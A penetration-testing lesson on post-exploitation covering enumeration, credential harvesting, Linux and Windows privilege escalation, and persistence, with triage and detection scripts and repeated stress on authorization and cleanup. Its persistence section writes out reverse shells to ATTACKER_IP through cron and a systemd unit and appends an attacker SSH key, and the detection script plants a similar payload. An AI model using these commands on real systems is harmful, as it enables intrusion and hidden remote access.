Post-Exploitation & Looting
After the shell: situational awareness, credential harvesting, persistence concepts, and privilege escalation.
Getting a shell is not the end - it's the beginning of a new phase with its own questions. You've proven you can get in. Now you need to understand what that means for the organization. What data could an attacker reach? Could they escalate privileges? Move to other systems? How long could they persist undetected? Post-exploitation answers all of this, and it's what transforms a technical access finding into a business impact narrative.
Everything Here Requires Prior Authorization
Post-exploitation techniques - credential harvesting, persistence, privilege escalation, lateral movement - are among the most serious actions you can take on a system. These techniques are illegal on any system you do not own or have explicit written authorization to test. In authorized engagements, they must be performed within the agreed scope. Never install persistence mechanisms on client systems without explicit permission to do so, and always clean up any artifacts you create.
What Post-Exploitation Is For
The purpose of post-exploitation in a penetration test is not to cause maximum damage or achieve maximum access. It is to demonstrate realistic business impact.
The question you're answering for your report: "An attacker who gained this foothold could have..."
- Read, modified, or exfiltrated sensitive data (define the data category and sensitivity)
- Escalated to administrative/root access
- Moved laterally to other systems on the network
- Established persistent access for long-term presence
- Disrupted operations
Each of these is a finding with a specific severity level and remediation path. Your post-exploitation work is evidence-gathering for the report.
Situational Awareness: The First Five Minutes
The first thing after landing a shell is to silently map your environment. You want to know where you are, who you are, and what's around you - without making noise.
Understand Your Current User Context
Running sudo -l can hold a surprise: www-data can run python3 as any user with no password. That is a misconfigured sudoers entry and a direct privilege escalation path - python3 can spawn a shell, so a root shell is one command away (GTFOBins, referenced below, has the exact invocation).
Understand the System
An interface listing (ip addr) that shows eth1 on 10.10.20.5/24 next to the public interface means this machine is dual-homed: there is an internal network segment reachable from this foothold that is not reachable from the internet. This is a pivoting target (covered in the next lesson).
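The two signals called out above (a NOPASSWD sudo entry and a second network segment) are easy to miss in raw command output. The script below is an added example, not code from the original lesson: it parses `sudo -l` and `ip -o -4 addr show` output and flags both. The sample outputs embedded in it are constructed to match the www-data / eth1 scenario in the text, not captured from a real host; run it with `--live` to use the real commands.

```shell
#!/bin/sh
# First-five-minutes triage: pick NOPASSWD sudo entries and a second network
# segment out of `sudo -l` and `ip -o -4 addr show` output. Added example, not
# code from the page; the sample outputs below are constructed, not captured.

# Print the command part of every NOPASSWD entry in `sudo -l` output, one per
# line, e.g. "(ALL) NOPASSWD: /usr/bin/python3, /bin/cat" -> two lines.
nopasswd_sudo_entries() {
    sed -n '/may run the following commands/,$p' \
    | grep 'NOPASSWD:' \
    | sed -E 's/^.*NOPASSWD:[[:space:]]*//' \
    | tr ',' '\n' \
    | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' \
    | grep -v '^$'
}

# Print "iface cidr" for every non-loopback IPv4 address in `ip -o -4 addr show`
# output; the field layout is "N: iface inet A.B.C.D/len ...".
ipv4_subnets() {
    awk '$2 != "lo" && $3 == "inet" { print $2, $4 }'
}

# True (exit 0) when addresses are configured on more than one interface,
# i.e. the host bridges two segments and is a pivot candidate.
is_dual_homed() {
    n=$(ipv4_subnets | awk '{ seen[$1] = 1 } END { c = 0; for (k in seen) c++; print c }')
    [ "$n" -gt 1 ]
}

# Constructed `sudo -l` output for the www-data scenario in the text.
SAMPLE_SUDO='Matching Defaults entries for www-data on web01:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/python3'

# Constructed `ip -o -4 addr show` output for a dual-homed web server.
SAMPLE_IP='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: eth0    inet 203.0.113.10/24 brd 203.0.113.255 scope global eth0\       valid_lft forever preferred_lft forever
3: eth1    inet 10.10.20.5/24 brd 10.10.20.255 scope global eth1\       valid_lft forever preferred_lft forever'

# Run on live command output with --live, otherwise on the samples above.
triage() {
    if [ "${1:-}" = "--live" ]; then
        sudo_out=$(sudo -n -l 2>/dev/null || true)     # -n: never block on a password prompt
        ip_out=$(ip -o -4 addr show 2>/dev/null || true)
    else
        sudo_out=$SAMPLE_SUDO
        ip_out=$SAMPLE_IP
    fi
    echo "[*] running as: $(id 2>/dev/null || echo unknown)"
    echo "[*] NOPASSWD sudo entries (check each on GTFOBins):"
    printf '%s\n' "$sudo_out" | nopasswd_sudo_entries | sed 's/^/    /'
    echo "[*] IPv4 addresses:"
    printf '%s\n' "$ip_out" | ipv4_subnets | sed 's/^/    /'
    if printf '%s\n' "$ip_out" | is_dual_homed; then
        echo "[!] dual-homed: an internal segment is reachable from this foothold (pivot target)"
    fi
}

triage "$@"
```

`sudo -n` is deliberate: an interactive password prompt on a reverse shell hangs the session, and a failed prompt is logged, so the non-interactive form is both quieter and safer.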
Find Interesting Files and Directories
Credential Harvesting
Credentials found during post-exploitation often enable privilege escalation, lateral movement, or demonstrate direct impact on sensitive systems.
Configuration Files
Web applications almost always store database credentials in configuration files: Laravel's .env, WordPress's wp-config.php, Django's settings.py, and similar files for every framework.
A Laravel .env that points at a database on 10.10.20.100 - an internal host - is both credential-reuse potential and a pivot target.
SSH Keys
Unprotected SSH private keys (no passphrase, world-readable, or sitting in a web root or backup directory) are critical findings. Such a key might authenticate to internal systems or allow lateral movement to other servers.
Memory and Process Credential Dumps
On Linux, a process's memory can sometimes be read to extract credentials: root, or the owner of a process that can be ptrace-attached, can read /proc/<pid>/mem or dump the process with gcore and search the dump for passwords. This is noisier than reading files but powerful.
On Windows, the Meterpreter hashdump command pulls NTLM hashes from the SAM. These can be cracked offline with hashcat or passed directly in pass-the-hash attacks - no cracking required.
Credential Scope and Sensitivity
During authorized testing you will encounter real credentials - production database passwords, service account credentials, private keys. Document what you found (type, location, that credentials exist) without storing the actual credential values in your notes beyond what's needed for the report. Treat credentials with the same care as the most sensitive data they protect.
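The config-file and SSH-key hunting above, combined with the handling rule just stated, as an added example that is not part of the original lesson: the script lists credential-bearing settings with the values redacted (only type, location and length are kept for the notes) while printing host and user settings in the clear as pivot hints, and it finds private key files and reports their mode. The `.env` and key file built by `make_sample_dir` are constructed placeholders, not real credentials.

```shell
#!/bin/sh
# Credential triage that keeps secrets out of your notes: secret-looking
# settings are reported as <redacted len=N>, host/user settings in clear as
# pivot hints, and private keys with their file mode. Added example, not code
# from the page; the .env and key in make_sample_dir are constructed.

# Scan one config file (KEY=value, key: value or 'key' => 'value' per line).
redacted_secrets() {
    awk -v file="$1" -v q="'" '
    BEGIN {
        quote = "[\"" q "]"
        re = "^[ \t]*" quote "?[A-Za-z_][A-Za-z0-9_.]*" quote "?[ \t]*(=>?|:)[ \t]*"
    }
    match($0, re) {
        key = substr($0, RSTART, RLENGTH)
        gsub("[ \t=>:]", "", key); gsub(quote, "", key)
        val = substr($0, RSTART + RLENGTH)
        sub("^" quote, "", val)
        sub(quote "?[,;]?[ \t]*$", "", val)
        if (val == "") next                       # empty setting: nothing to report
        lk = tolower(key)
        if (lk ~ /pass|secret|token|key|credential/)
            printf "%s:%d %s=<redacted len=%d>\n", file, NR, key, length(val)
        else if (lk ~ /user|host|server|url|dsn|port/)
            printf "%s:%d %s=%s (target hint)\n", file, NR, key, val
    }' "$1"
}

# Find private key files under a directory; report mode and whether the PEM
# header says the key is passphrase-protected.
find_private_keys() {
    find "$1" -type f -size -64k 2>/dev/null | while IFS= read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q '^-----BEGIN .*PRIVATE KEY-----'; then
            if grep -q 'ENCRYPTED' "$f"; then
                state="passphrase-protected (PEM ENCRYPTED header)"
            else
                state="no PEM encryption header: unprotected, or OpenSSH format (check with ssh-keygen -y -f)"
            fi
            printf '%s mode=%s %s\n' "$f" "$(ls -l "$f" | cut -c1-10)" "$state"
        fi
    done
}

# Constructed sample tree: a Laravel-style .env and a placeholder key file.
make_sample_dir() {
    d=$(mktemp -d)
    cat > "$d/.env" <<'EOF'
# constructed example values, not real credentials
APP_NAME=Laravel
APP_KEY=base64:abcdefghij
DB_HOST=10.10.20.100
DB_USERNAME=app
DB_PASSWORD="S3cr3t-Pa55"
MAIL_PASSWORD=
EOF
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'NOT-A-REAL-KEY' '-----END RSA PRIVATE KEY-----' > "$d/id_rsa"
    chmod 644 "$d/id_rsa"                         # world-readable: the finding
    printf '%s\n' "$d"
}

if [ -n "${1:-}" ]; then                          # scan a real tree, e.g. /var/www
    find "$1" -type f \( -name '.env' -o -name '*.php' -o -name '*.ini' -o -name '*.yml' -o -name '*.properties' \) 2>/dev/null \
    | while IFS= read -r cfg; do redacted_secrets "$cfg"; done
    find_private_keys "$1"
else                                              # demo on the constructed sample
    d=$(make_sample_dir)
    redacted_secrets "$d/.env"
    find_private_keys "$d"
    rm -rf "$d"
fi
```

The redacted line is what goes in the notes: the key name proves the credential type, the file and line number prove the location, and the length is enough for the client to recognise which secret it was without the value ever leaving the host.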
The Link to Privilege Escalation
Post-exploitation and privilege escalation are inseparable. The findings from situational awareness directly feed privilege escalation attempts.
Linux PrivEsc Vectors
The most commonly exploited local privilege escalation vectors on Linux:
Misconfigured sudo:
GTFOBins (gtfobins.github.io) is an invaluable reference - it catalogs how over 200 binaries can be abused for privilege escalation, shell escaping, and file reads when they have sudo, SUID, or capabilities.
SUID/SGID binaries:
Writable cron jobs:
Kernel exploits:
The uname -a from situational awareness gives you the kernel version. Cross-reference it against exploit databases: DirtyCow (CVE-2016-5195), Dirty Pipe (CVE-2022-0847), and dozens of others. PwnKit (CVE-2021-4034) is often listed alongside them, but it is a bug in polkit's SUID pkexec binary, not the kernel, so it belongs under the SUID vector above and is far less likely to crash the host. Kernel exploits are high-risk - they can crash the system, and distribution kernels backport fixes without changing the upstream version string, so a version match is a hint, not proof. Run them in a lab first.
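Three of the vectors above can be checked mechanically from the enumeration you already did. The following is an added example, not code from the lesson: it cross-references SUID binaries against a short GTFOBins list, finds cron entries whose target script (or its directory) the current user can write, and tests a kernel version against the Dirty Pipe window. The GTFOBins shortlist is a hand-picked subset you should verify against gtfobins.github.io, and the SUID and crontab inputs in the demo are constructed; `--live` runs the same checks against the real system.

```shell
#!/bin/sh
# Privilege escalation triage: SUID binaries with a GTFOBins entry, cron entries
# whose target the current user can write, and a kernel version inside the
# Dirty Pipe window. Added example, not code from the page. The GTFOBins
# shortlist is a hand-picked subset; the demo inputs are constructed.

# Binaries GTFOBins documents as abusable when SUID (shell, file read or write).
GTFO_SUID="bash sh dash find vim vi nmap python python3 perl env awk gawk cp less more tar"

# Read SUID paths on stdin (e.g. find / -perm -4000 -type f 2>/dev/null) and
# print those whose basename is on the shortlist.
interesting_suid() {
    while IFS= read -r path; do
        name=${path##*/}
        for g in $GTFO_SUID; do
            if [ "$name" = "$g" ]; then printf '%s (see GTFOBins: %s)\n' "$path" "$g"; fi
        done
    done
}

# Read /etc/crontab-style lines (schedule, user, command) on stdin and print
# entries whose target file or parent directory the current user can write:
# editing or replacing that script runs code as the listed user.
writable_cron_targets() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*|[A-Za-z_]*) continue ;; esac   # blank, comment, VAR=value
        set -f; set -- $line; set +f                           # split fields without globbing '*'
        case "$1" in
            @*) user=$2; cmd=$3 ;;                              # @reboot user command
            *)  [ $# -ge 7 ] || continue; user=$6; cmd=$7 ;;    # m h dom mon dow user command
        esac
        case "$cmd" in /*) ;; *) continue ;; esac               # only absolute paths
        if [ -w "$cmd" ]; then
            printf '%s runs as %s: WRITABLE file\n' "$cmd" "$user"
        elif [ -w "${cmd%/*}" ]; then
            printf '%s runs as %s: writable directory %s\n' "$cmd" "$user" "${cmd%/*}"
        fi
    done
}

# True when dotted version $1 is strictly lower than $2 (missing parts count as 0).
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = na > nb ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i in x) ? x[i] + 0 : 0; yi = (i in y) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# Dirty Pipe (CVE-2022-0847): introduced in 5.8, fixed upstream in 5.16.11,
# 5.15.25 and 5.10.102; the other 5.8-5.16 branches were end-of-life and got
# no fix. Distribution kernels backport fixes without changing this string,
# so a hit means "read the changelog", not "the exploit will work".
dirty_pipe_candidate() {
    v=${1%%-*}                                    # "5.15.0-91-generic" -> "5.15.0"
    if version_lt "$v" 5.8; then return 1; fi
    case "$v" in
        5.10.*) version_lt "$v" 5.10.102 ;;
        5.15.*) version_lt "$v" 5.15.25 ;;
        5.16.*) version_lt "$v" 5.16.11 ;;
        *)      version_lt "$v" 5.17 ;;
    esac
}

# Constructed inputs for the demo; --live runs against the real system.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python3
/usr/bin/find'
SAMPLE_CRON='SHELL=/bin/sh
# m h dom mon dow user command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * root /tmp/backup.sh
@reboot root /opt/backup/start.sh'

if [ "${1:-}" = "--live" ]; then
    k=$(uname -r)
    echo "[*] kernel $k"; dirty_pipe_candidate "$k" && echo "    in the Dirty Pipe range - check the distro changelog before trying it"
    echo "[*] SUID binaries with a GTFOBins entry:"; find / -perm -4000 -type f 2>/dev/null | interesting_suid
    echo "[*] writable cron targets:"; cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_cron_targets
else
    printf '%s\n' "$SAMPLE_SUID" | interesting_suid
    printf '%s\n' "$SAMPLE_CRON" | writable_cron_targets   # prints /tmp/backup.sh only if it exists and is writable
    dirty_pipe_candidate 5.10.50-generic && echo "5.10.50-generic: Dirty Pipe candidate"
fi
```

The cron check only looks at the first word of the command; an entry such as `root run-parts /etc/cron.daily` is skipped even though every script in that directory is a target, so still read the raw crontab yourself.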
Windows PrivEsc Vectors
Similar patterns apply on Windows:
- Unquoted service paths - a service whose binary path contains spaces and isn't quoted (C:\Program Files\My App\svc.exe) is resolved by trying C:\Program.exe and C:\Program Files\My.exe first; if you can write to one of those locations, your binary runs as the service account
- Writable service executables - you can replace a service binary that runs as SYSTEM
- AlwaysInstallElevated - MSI packages install as SYSTEM when the AlwaysInstallElevated value is set to 1 under both HKLM and HKCU\Software\Policies\Microsoft\Windows\Installer
- SeImpersonatePrivilege - common on service accounts (IIS, SQL Server), exploitable via Potato attacks to escalate to SYSTEM
WinPEAS and LinPEAS are automated enumeration scripts that surface all these vectors systematically. They generate verbose output - learn to read it before you rely on it.
Persistence Concepts (and Their Detection)
Persistence is the ability to maintain access even after the system reboots or the initial exploit vector is patched. In a pentest, persistence is almost always in scope only if explicitly authorized - it's a finding you demonstrate conceptually and then clean up.
Linux Persistence Methods
Cron jobs:

```bash
# Add a cron job that calls back every 5 minutes. Cron runs entries with /bin/sh,
# which does not understand >& or /dev/tcp, so the payload is wrapped in bash -c.
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
```

Detection: crontab -l as each user, /etc/cron.d/, /var/spool/cron/crontabs/

SSH authorized_keys:

```bash
# Add your public key to the target user's authorized_keys
echo "ssh-rsa AAAA...attacker-key..." >> /home/alice/.ssh/authorized_keys
```

Detection: monitor ~/.ssh/authorized_keys for changes, SSH login anomaly detection

Systemd services:

```bash
# Create a malicious service; the [Install] section is what lets `systemctl enable`
# wire it into the boot sequence (without it, enable has nothing to link)
cat > /etc/systemd/system/updater.service << EOF
[Unit]
Description=System updater

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always

[Install]
WantedBy=multi-user.target
EOF
systemctl enable updater   # add --now to start it immediately rather than at next boot
```

Detection: systemctl list-unit-files, monitor /etc/systemd/system/
Windows Persistence Methods
- Registry Run keys - HKCU\Software\Microsoft\Windows\CurrentVersion\Run (and the HKLM equivalent)
- Scheduled tasks - schtasks /create
- Service creation - sc create
- DLL hijacking - placing a malicious DLL in a directory that a service searches before the legitimate DLL location
Each of these has a corresponding detection technique. The defender's playbook: audit startup locations, monitor service creation events, watch for new scheduled tasks, baseline authorized_keys files.
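The defender's playbook just described, as an added example that is not part of the original lesson: snapshot the startup locations (cron, systemd units, authorized_keys) by hash, diff a later snapshot against the baseline to surface additions, changes and removals, and grep the same places for reverse-shell style payloads such as the cron and systemd entries shown above. The directory tree built by `make_sample_tree` and the entries `plant_sample_persistence` drops into it are constructed stand-ins for the real paths; the `snapshot`, `compare` and `scan` subcommands work on a live host.

```shell
#!/bin/sh
# Persistence detection: hash-baseline the startup locations, diff a later
# snapshot, and content-scan the same places. Added example, not code from
# the page; the sample tree and planted entries are constructed stand-ins.

# Locations watched on a real host; override with STARTUP_DIRS="..." if needed.
STARTUP_DIRS=${STARTUP_DIRS:-"/etc/cron.d /etc/crontab /var/spool/cron /etc/systemd/system /root/.ssh /home/*/.ssh"}

hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
    else openssl dgst -sha256 "$1" | awk '{ print $NF }'
    fi
}

# Emit "sha256<TAB>path" for every regular file under the given paths, sorted.
snapshot() {
    for p in "$@"; do
        [ -e "$p" ] || continue
        find "$p" -type f 2>/dev/null
    done | sort | while IFS= read -r f; do
        printf '%s\t%s\n' "$(hash_file "$f")" "$f"
    done
}

# Diff two snapshots: ADDED (new file), CHANGED (hash differs), REMOVED (gone).
compare_snapshots() {
    awk -F'\t' '
        FILENAME == ARGV[1] { base[$2] = $1; next }
        {
            if (!($2 in base))       print "ADDED   " $2
            else if (base[$2] != $1) print "CHANGED " $2
            seen[$2] = 1
        }
        END { for (p in base) if (!(p in seen)) print "REMOVED " p }
    ' "$1" "$2"
}

# Content scan: patterns from the persistence examples above (bash /dev/tcp
# reverse shells, nc -e, mkfifo pipes, base64 stagers, curl|sh fetchers).
suspicious_startup_lines() {
    grep -rnE '/dev/tcp/|bash -i|mkfifo|nc(at)? .*-e |base64 (-d|--decode)|(curl|wget) .*\| *(ba)?sh' "$@" 2>/dev/null
}

# Constructed tree standing in for /etc/cron.d, /etc/systemd/system and ~/.ssh.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/cron.d" "$d/systemd" "$d/.ssh"
    printf '%s\n' '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf' > "$d/cron.d/logrotate"
    printf '%s\n' 'ssh-ed25519 AAAAC3...constructed... alice@laptop' > "$d/.ssh/authorized_keys"
    printf '%s\n' "$d"
}

# Plant the cron and authorized_keys persistence from the text into the tree.
plant_sample_persistence() {
    printf '%s\n' "*/5 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'" > "$1/cron.d/updater"
    printf '%s\n' 'ssh-rsa AAAAB3...attacker-key... ' >> "$1/.ssh/authorized_keys"
}

case "${1:-}" in
    snapshot) snapshot $STARTUP_DIRS ;;                     # once, on a known-good host: > baseline.txt
    compare)  compare_snapshots "$2" "$3" ;;                # baseline.txt current.txt
    scan)     suspicious_startup_lines $STARTUP_DIRS || true ;;
    *)  d=$(make_sample_tree)                               # demo on the constructed tree
        snapshot "$d" > "$d.base"; plant_sample_persistence "$d"; snapshot "$d" > "$d.cur"
        compare_snapshots "$d.base" "$d.cur"
        suspicious_startup_lines "$d" || true
        rm -rf "$d" "$d.base" "$d.cur" ;;
esac
```

Keep the baseline file off the host it describes (an attacker with root can rewrite it along with the startup entries), and treat the content scan as a quick triage only: it catches the textbook payloads on this page, not an obfuscated one.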
Always Clean Up
In any authorized engagement, every persistence mechanism you install must be removed at the end of the test. Document what you created (exact commands, locations, timestamps), then verify you've removed it. Leaving backdoors on client systems - even by accident - is a serious breach of professional conduct. Agree with the client upfront on exactly what persistence testing is authorized and what cleanup procedures will be followed.
Automated Post-Exploitation Enumeration
Manual enumeration is slow. Automated tools surface findings quickly, but you still need to read and understand the output.
LinPEAS (Linux): Comprehensive automated privilege escalation enumeration. Output is colour-coded: red-on-yellow highlights are what the script rates as near-certain privilege escalation vectors, plain red is worth investigating, and the rest is context.
WinPEAS (Windows): Equivalent for Windows targets. Can be run as a .exe or .bat.
Metasploit local_exploit_suggester: Checks the target against known local privilege escalation modules in MSF.
Documenting Impact
Post-exploitation findings need to be translated into business impact for the report. The technical finding alone is not enough:
| Technical Finding | Business Impact Statement |
|---|---|
| Shell as www-data | Access to web application source code, database credentials |
| Root via sudo python3 | Full system compromise - all data, all services |
| SSH key in /var/www | Lateral movement to other servers using shared credentials |
| NTLM hashes | Offline password cracking; pass-the-hash to other domain systems |
| Dual-homed network | Access to internal network segment not reachable from internet |
This translation is what your executives need to understand why the technical findings matter.
Key Takeaways
- Post-exploitation answers "what could an attacker actually do with this foothold?" - it defines business impact.
- Situational awareness (current user, network interfaces, running processes, active users) is your first five minutes after landing a shell.
- Credential harvesting targets configuration files, SSH keys, and memory - each can enable lateral movement or privilege escalation.
- Privilege escalation leverages post-exploitation findings: misconfigured sudo, SUID binaries, writable cron jobs, kernel exploits.
- Persistence must be explicitly authorized and always cleaned up - document every artifact you create.
- Automated tools (LinPEAS, WinPEAS, MSF suggester) accelerate enumeration but are not a substitute for understanding what you find.
- All technical findings must be translated into business impact statements for the report.